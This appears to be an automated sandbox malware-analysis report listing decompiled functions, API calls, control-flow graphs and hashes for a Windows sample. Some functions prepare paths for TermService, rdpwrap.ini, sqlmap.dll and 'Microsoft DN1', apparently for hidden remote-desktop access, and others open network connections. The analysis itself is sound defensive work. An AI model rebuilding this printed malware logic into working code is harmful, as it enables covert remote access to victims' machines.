                                      0x004407b8
                                      0x004407b8
                                      0x004407ba
                                      0x004407bd
                                      0x004407c3
                                      0x004407c5
                                      0x004407c8
                                      0x004407cb
                                      0x004407cc
                                      0x004407cf
                                      0x004407d1
                                      0x00000000
                                      0x004407ba
                                      0x004407b6
                                      0x0044077d
                                      0x0044078d
                                      0x00440792
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00440792
                                      0x00440806
                                      0x0044080b
                                      0x00440810
                                      0x00440813
                                      0x00440813
                                      0x00440816
                                      0x0044081b
                                      0x00440820
                                      0x00440823
                                      0x00440823
                                      0x00440826
                                      0x00000000
                                      0x00440826
                                      0x0044072a
                                      0x00440830

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 004406E4
                                      • CoCreateInstance.OLE32(004425A0,00000000,00000001,00444834,?), ref: 00440704
                                      • VariantInit.OLEAUT32(?), ref: 00440760
                                      • CoUninitialize.OLE32 ref: 00440826
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInitInitializeInstanceUninitializeVariant
                                      • String ID: Description$FriendlyName
                                      • API String ID: 4142528535-3192352273
                                      • Opcode ID: 671c1dea1cc5a47620d9b3a300dc35bc6e15fe4e95a975526f78cf3955704192
                                      • Instruction ID: 93afb7116fd28a642984587422d658e1fe89e428312645c93fddd83b126eb9f9
                                      • Opcode Fuzzy Hash: 671c1dea1cc5a47620d9b3a300dc35bc6e15fe4e95a975526f78cf3955704192
                                      • Instruction Fuzzy Hash: 83412178A00205AFEB14DFA5C984EAFBBB9EFC9704B14445EF505EB250DB78E901CB64
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Function 0043C987, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 102UNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 79%
                                      			E0043C987(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t6;
				void* _t9;
				void* _t10;
				void* _t14;
				void* _t22;
				void* _t31;
				intOrPtr _t32;
				void* _t50;
				intOrPtr _t53;
				void* _t62;

				_t50 = __edx;
				_push(__ecx);
				InitializeCriticalSection(0x447cd8);
				_t53 = 5;
				asm("xorps xmm0, xmm0");
				 *0x447d24 = _t53;
				 *0x447d1c = _t53;
				_t31 = 0x18;
				asm("movups [0x447cf0], xmm0");
				 *0x447d00 = 0;
				asm("movups [0x447d08], xmm0");
				 *0x447d20 = 0;
				_t6 = E00435ADB(_t31);
				if(_t6 == 0) {
					_t32 = 0;
				} else {
					 *_t6 = _t53;
					_t1 = _t6 + 4; // 0x4
					_t32 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x447d18 = _t32;
				 *0x447d30 = 0;
				 *0x447d34 = 0; // executed
				E0043312C(0x447d00, _t50, L"TermService"); // executed
				_t54 = L"%ProgramFiles%";
				E0043312C(0x447d0c, _t50, L"%ProgramFiles%"); // executed
				_t9 = E0043DBF3(0x447d0c); // executed
				_t65 = _t9 - 1;
				if(_t9 != 1) {
					_t51 = 0x447d0c;
					_t10 = E00433001( &_v8, 0x447d0c, __eflags); // executed
					_t62 = 0x447d10;
					E00433264(0x447d10, _t10); // executed
					E00435A2D(_v8);
				} else {
					E0043312C(0x447d0c, _t50, L"%ProgramW6432%");
					_t51 = 0x447d0c;
					_t22 = E00433001( &_v8, 0x447d0c, _t65);
					_t62 = 0x447d10;
					E00433264(0x447d10, _t22);
					E00435A2D(_v8);
					E0043312C(0x447d0c, 0x447d0c, _t54);
				}
				_t55 = L"\\Microsoft DN1";
				E00433297(_t62, _t51, _t65, L"\\Microsoft DN1"); // executed
				_t14 = E00433297(0x447d0c, _t51, _t65, _t55); // executed
				E0043D70F(_t14, _t62);
				E00433264(0x447d14, _t62); // executed
				E00433297(0x447d14, _t51, _t65, L"\\rdpwrap.ini"); // executed
				_t57 = L"\\sqlmap.dll";
				E00433297(_t62, _t51, _t65, L"\\sqlmap.dll"); // executed
				E00433297(0x447d0c, _t51, _t65, _t57); // executed
				return 0x447cd8;
			}














                                      0x0043c987
                                      0x0043c98a
                                      0x0043c993
                                      0x0043c99b
                                      0x0043c99c
                                      0x0043c99f
                                      0x0043c9a7
                                      0x0043c9af
                                      0x0043c9b0
                                      0x0043c9b7
                                      0x0043c9bd
                                      0x0043c9c4
                                      0x0043c9ca
                                      0x0043c9d1
                                      0x0043c9e3
                                      0x0043c9d3
                                      0x0043c9d3
                                      0x0043c9d5
                                      0x0043c9d5
                                      0x0043c9dc
                                      0x0043c9dd
                                      0x0043c9de
                                      0x0043c9df
                                      0x0043c9e0
                                      0x0043c9e0
                                      0x0043c9e5
                                      0x0043c9f5
                                      0x0043c9fb
                                      0x0043ca01
                                      0x0043ca06
                                      0x0043ca13
                                      0x0043ca18
                                      0x0043ca1d
                                      0x0043ca20
                                      0x0043ca57
                                      0x0043ca5c
                                      0x0043ca61
                                      0x0043ca69
                                      0x0043ca71
                                      0x0043ca22
                                      0x0043ca29
                                      0x0043ca2e
                                      0x0043ca33
                                      0x0043ca38
                                      0x0043ca40
                                      0x0043ca48
                                      0x0043ca50
                                      0x0043ca50
                                      0x0043ca76
                                      0x0043ca7e
                                      0x0043ca86
                                      0x0043ca8d
                                      0x0043ca9a
                                      0x0043caa6
                                      0x0043caab
                                      0x0043cab3
                                      0x0043cabb
                                      0x0043cac9

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00447CD8), ref: 0043C993
                                        • Part of subcall function 00435ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0043E415,?,?,00000000,004355C4,?,?,00000000), ref: 00435ADE
                                        • Part of subcall function 00435ADB: HeapAlloc.KERNEL32(00000000,?,00000000,004355C4,?,?,00000000), ref: 00435AE5
                                        • Part of subcall function 00433001: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00433034
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                      • String ID: %ProgramFiles%$%ProgramW6432%$TermService$\Microsoft DN1$\rdpwrap.ini$\sqlmap.dll
                                      • API String ID: 2811233055-2974354589
                                      • Opcode ID: 9d83add256c8c44cd92fa4fb96a2fc01e0b0fac5c4a2618e3395d0e40174b29d
                                      • Instruction ID: 097455e8c64876216a54485ab53261bb30d8750e3eac8d736681e2c32ba9d1ed
                                      • Opcode Fuzzy Hash: 9d83add256c8c44cd92fa4fb96a2fc01e0b0fac5c4a2618e3395d0e40174b29d
                                      • Instruction Fuzzy Hash: 1131D860F1420067D704BF2AAC8253E66A99FCDB0DF11647FB00697292DF7C8E42879C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC62F8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1106 cc62f8-cc6304 1107 cc63aa-cc63ad 1106->1107 1108 cc6309-cc6319 1107->1108 1109 cc63b3 1107->1109 1110 cc631b-cc631e 1108->1110 1111 cc6326-cc633f LoadLibraryExW 1108->1111 1112 cc63b5-cc63bb 1109->1112 1113 cc6324 1110->1113 1114 cc63a7 1110->1114 1115 cc6391-cc639a 1111->1115 1116 cc6341-cc634a GetLastError 1111->1116 1118 cc63a3-cc63a5 1113->1118 1114->1107 1117 cc639c-cc639d FreeLibrary 1115->1117 1115->1118 1119 cc634c-cc635e call cc5be1 1116->1119 1120 cc6381 1116->1120 1117->1118 1118->1114 1122 cc63bc-cc63be 1118->1122 1119->1120 1126 cc6360-cc6372 call cc5be1 1119->1126 1121 cc6383-cc6385 1120->1121 1121->1115 1124 cc6387-cc638f 1121->1124 1122->1112 1124->1114 1126->1120 1129 cc6374-cc637f LoadLibraryExW 1126->1129 1129->1121
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: 24b7b453efaf2544496cdfb35e725402bae4a7c5435630751514d1faca747851
                                      • Instruction ID: 191f382599201840971ead1e611144055b6d080dfb90a22e0e90786cc5c369ca
                                      • Opcode Fuzzy Hash: 24b7b453efaf2544496cdfb35e725402bae4a7c5435630751514d1faca747851
                                      • Instruction Fuzzy Hash: 1E212731E012A1EBCB314A76DE85F6E77689F45760F28021DFD65AB2B1DA30EE0095E0
                                      Uniqueness

                                      Uniqueness Score: 3.32%

                                      Function 00CD1106, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38networkUNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1130 cd1106-cd1135 WSAStartup socket 1131 cd113c-cd1176 inet_addr htons connect 1130->1131 1132 cd1137-cd7a10 1130->1132 1133 cd117f 1131->1133 1134 cd1178 1131->1134 1133->1130 1134->1133
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00CD1119
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00CD1128
                                      • inet_addr.WS2_32(8.8.8.8), ref: 00CD114A
                                      • htons.WS2_32(00000035), ref: 00CD1155
                                      • connect.WS2_32(FFFFFFFF,?,00000010), ref: 00CD1169
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Startupconnecthtonsinet_addrsocket
                                      • String ID: 8.8.8.8
                                      • API String ID: 4117409672-3817307869
                                      • Opcode ID: fdbbfc11f6065c88d4c8d9cc96ca714610d05a449406654a62abbd33d00da74a
                                      • Instruction ID: ad03f37bc3ed6cabf112921624288c0d4d1c24436d55eb1f34dda53e2d91dc1f
                                      • Opcode Fuzzy Hash: fdbbfc11f6065c88d4c8d9cc96ca714610d05a449406654a62abbd33d00da74a
                                      • Instruction Fuzzy Hash: D801E574D00259EFDB209FA0EC49BEDB634AB09721F00831AEA316A2E0D7B40941DF61
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CCB50D, Relevance: 9.2, APIs: 6, Instructions: 197COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1137 ccb50d-ccb526 1138 ccb53c-ccb541 1137->1138 1139 ccb528-ccb538 call ccde58 1137->1139 1140 ccb54e-ccb574 MultiByteToWideChar 1138->1140 1141 ccb543-ccb54b 1138->1141 1139->1138 1146 ccb53a 1139->1146 1143 ccb6ce-ccb6e1 call cc1c5e 1140->1143 1144 ccb57a-ccb586 1140->1144 1141->1140 1147 ccb5bd 1144->1147 1148 ccb588-ccb58d 1144->1148 1146->1138 1150 ccb5bf-ccb5c1 1147->1150 1151 ccb58f-ccb598 call cd0380 1148->1151 1152 ccb5a2-ccb5ad call cc6edf 1148->1152 1154 ccb5c7-ccb5d8 MultiByteToWideChar 1150->1154 1155 ccb6c3 1150->1155 1164 ccb5b8-ccb5bb 1151->1164 1165 ccb59a-ccb5a0 1151->1165 1152->1164 1166 ccb5af 1152->1166 1154->1155 1158 ccb5de-ccb5f0 call cc6656 1154->1158 1159 ccb6c5-ccb6cc call cc9a9e 1155->1159 1167 ccb5f5-ccb5f9 1158->1167 1159->1143 1164->1150 1169 ccb5b5 1165->1169 1166->1169 1167->1155 1170 ccb5ff-ccb607 1167->1170 1169->1164 1171 ccb609-ccb60e 1170->1171 1172 ccb641-ccb64d 1170->1172 1171->1159 1173 ccb614-ccb616 1171->1173 1174 ccb67e 1172->1174 1175 ccb64f-ccb651 1172->1175 1173->1155 1176 ccb61c-ccb636 call cc6656 1173->1176 1177 ccb680-ccb682 1174->1177 1178 ccb666-ccb671 call cc6edf 1175->1178 1179 ccb653-ccb65c call cd0380 1175->1179 1176->1159 1193 ccb63c 1176->1193 1183 ccb6bc-ccb6c2 call cc9a9e 1177->1183 1184 ccb684-ccb69d call cc6656 1177->1184 1178->1183 1192 ccb673 1178->1192 1179->1183 1190 ccb65e-ccb664 1179->1190 1183->1155 1184->1183 1196 ccb69f-ccb6a6 1184->1196 1195 ccb679-ccb67c 1190->1195 1192->1195 1193->1155 1195->1177 1197 ccb6a8-ccb6a9 1196->1197 1198 ccb6e2-ccb6e8 1196->1198 1199 ccb6aa-ccb6ba WideCharToMultiByte 1197->1199 1198->1199 1199->1183 1200 ccb6ea-ccb6f1 call cc9a9e 1199->1200 1200->1159
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC4206,00CC4206,?,?,?,00CCB727,00000001,00000001,77E85006), ref: 00CCB567
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,00CCB727,00000001,00000001,77E85006,?,?,?), ref: 00CCB5D0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,77E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00CCB6B0
                                      • __freea.LIBCMT ref: 00CCB6BD
                                        • Part of subcall function 00CC6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,00CC852B,00001000,?,?,?,?,00CC3843), ref: 00CC6F11
                                      • __freea.LIBCMT ref: 00CCB6C6
                                      • __freea.LIBCMT ref: 00CCB6EB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocHeap
                                      • String ID:
                                      • API String ID: 3147120248-0
                                      • Opcode ID: 92132620736834e6f3b7aba126a40713ab0ed88c79702b5c26b6f583368b3ca6
                                      • Instruction ID: 9dd38b03d619431034ed769c77d8e549bc20c6920d74c0cb27c3acda9ecda56b
                                      • Opcode Fuzzy Hash: 92132620736834e6f3b7aba126a40713ab0ed88c79702b5c26b6f583368b3ca6
                                      • Instruction Fuzzy Hash: 65519F7260021AAFDB299FA4CC46FAF7BA9EF44750F25012DFD14A7250D770DE10A7A0
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Function 0043538F, Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1203 43538f-4353e4 call 432f52 call 43e20d getaddrinfo 1208 435443 1203->1208 1209 4353e6-4353ff socket 1203->1209 1211 435445-435453 call 435a2d 1208->1211 1209->1208 1210 435401-43543e htons freeaddrinfo connect 1209->1210 1212 435440 1210->1212 1213 435456-435465 ReleaseMutex 1210->1213 1212->1208 1213->1211
                                      C-Code - Quality: 37%
                                      			E0043538F(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx; // executed
				E00432F52(__ecx,  &_a4); // executed
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0043E20D(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0); // executed
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10); // executed
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E00435A2D(_a4);
				return _t53;
			}















                                      0x00435395
                                      0x004353a0
                                      0x004353a2
                                      0x004353b0
                                      0x004353b3
                                      0x004353ba
                                      0x004353c0
                                      0x004353c5
                                      0x004353cd
                                      0x004353d8
                                      0x004353d9
                                      0x004353dc
                                      0x004353e4
                                      0x00435443
                                      0x00435443
                                      0x004353e6
                                      0x004353ee
                                      0x004353f1
                                      0x004353f3
                                      0x004353f9
                                      0x004353ff
                                      0x00000000
                                      0x00435401
                                      0x00435404
                                      0x0043540c
                                      0x00435412
                                      0x00435416
                                      0x00435419
                                      0x00435422
                                      0x00435429
                                      0x00435435
                                      0x0043543e
                                      0x0043545c
                                      0x0043545f
                                      0x00435440
                                      0x00435440
                                      0x00000000
                                      0x00435440
                                      0x0043543e
                                      0x004353ff
                                      0x00435448
                                      0x00435453

                                      APIs
                                        • Part of subcall function 00432F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,004333F1,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 00432F7E
                                        • Part of subcall function 0043E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0043E211
                                      • getaddrinfo.WS2_32(?,00000000,00434AC8,00000000), ref: 004353DC
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 004353F3
                                      • htons.WS2_32(?), ref: 00435419
                                      • freeaddrinfo.WS2_32(00000000), ref: 00435429
                                      • connect.WS2_32(?,?,00000010), ref: 00435435
                                      • ReleaseMutex.KERNEL32(?), ref: 0043545F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                      • String ID:
                                      • API String ID: 2516106447-0
                                      • Opcode ID: 20020a6c0c87330d747629eec0c515b7ab0422b729944ed941ba60f9a3b2e4d9
                                      • Instruction ID: 969e3bd66ebb8d65cd28fcb9d89dfbf07ed3c3acd865b1df09c1b26d1768c3ec
                                      • Opcode Fuzzy Hash: 20020a6c0c87330d747629eec0c515b7ab0422b729944ed941ba60f9a3b2e4d9
                                      • Instruction Fuzzy Hash: 52219F75A00204ABDF10DF61D988BDA7BB8FF48325F108066FD09EB291D7749A41CB64
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      Function 0043586A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55UNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1216 43586a-43587d GetCommandLineA 1217 4358a7-4358a9 1216->1217 1218 43587f-435884 1216->1218 1221 4358a4-4358a5 1217->1221 1222 4358ab 1217->1222 1219 435897-4358a2 1218->1219 1220 435886 1218->1220 1224 4358b2 1219->1224 1223 435888-43588c 1220->1223 1221->1217 1225 4358b4-4358b6 1222->1225 1223->1219 1228 43588e-435895 1223->1228 1224->1225 1226 4358b8-4358e4 GetStartupInfoA call 4358f8 call 435925 GetModuleHandleA call 4411d0 1225->1226 1227 4358ad-4358af 1225->1227 1235 4358e9-4358f1 call 43590d ExitProcess 1226->1235 1227->1226 1230 4358b1 1227->1230 1228->1219 1228->1223 1230->1224
                                      C-Code - Quality: 100%
                                      			E0043586A() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;
				void* _t21;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E004358F8();
					E00435925(0x446000, 0x44602c);
					GetModuleHandleA(0);
					_t11 = E004411D0(0x44602c, _t21,  *_t2, 0x446000, 0x446000); // executed
					E0043590D();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}











                                      0x00435877
                                      0x00435879
                                      0x0043587d
                                      0x004358a7
                                      0x004358a7
                                      0x004358a9
                                      0x00000000
                                      0x00000000
                                      0x004358a4
                                      0x004358a4
                                      0x004358a5
                                      0x004358a5
                                      0x004358b4
                                      0x004358b6
                                      0x004358ad
                                      0x004358af
                                      0x00000000
                                      0x00000000
                                      0x004358b1
                                      0x004358b1
                                      0x004358b2
                                      0x004358b2
                                      0x00000000
                                      0x004358b2
                                      0x004358b8
                                      0x004358b8
                                      0x004358b8
                                      0x004358c0
                                      0x004358c6
                                      0x004358d5
                                      0x004358dc
                                      0x004358e4
                                      0x004358eb
                                      0x004358f1
                                      0x004358f1
                                      0x0043587f
                                      0x00435880
                                      0x00435884
                                      0x00435897
                                      0x00435897
                                      0x0043589d
                                      0x004358a0
                                      0x00000000
                                      0x004358a0
                                      0x00435886
                                      0x00435888
                                      0x00435888
                                      0x0043588c
                                      0x00000000
                                      0x00000000
                                      0x0043588e
                                      0x0043588f
                                      0x00435891
                                      0x00435895
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00435895
                                      0x00000000

                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 00435871
                                      • GetStartupInfoA.KERNEL32(?), ref: 004358C0
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004358DC
                                      • ExitProcess.KERNEL32 ref: 004358F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                      • String ID: ,`D
                                      • API String ID: 2164999147-3663366328
                                      • Opcode ID: b3805b4b3436125417399c6f6ab153c565ce5765d4b2e0dfda77009439d19a91
                                      • Instruction ID: 2d05f8276725d76bbfa8c054ae3e85e8ed4f56659e411ca5755f9e9e5f96b904
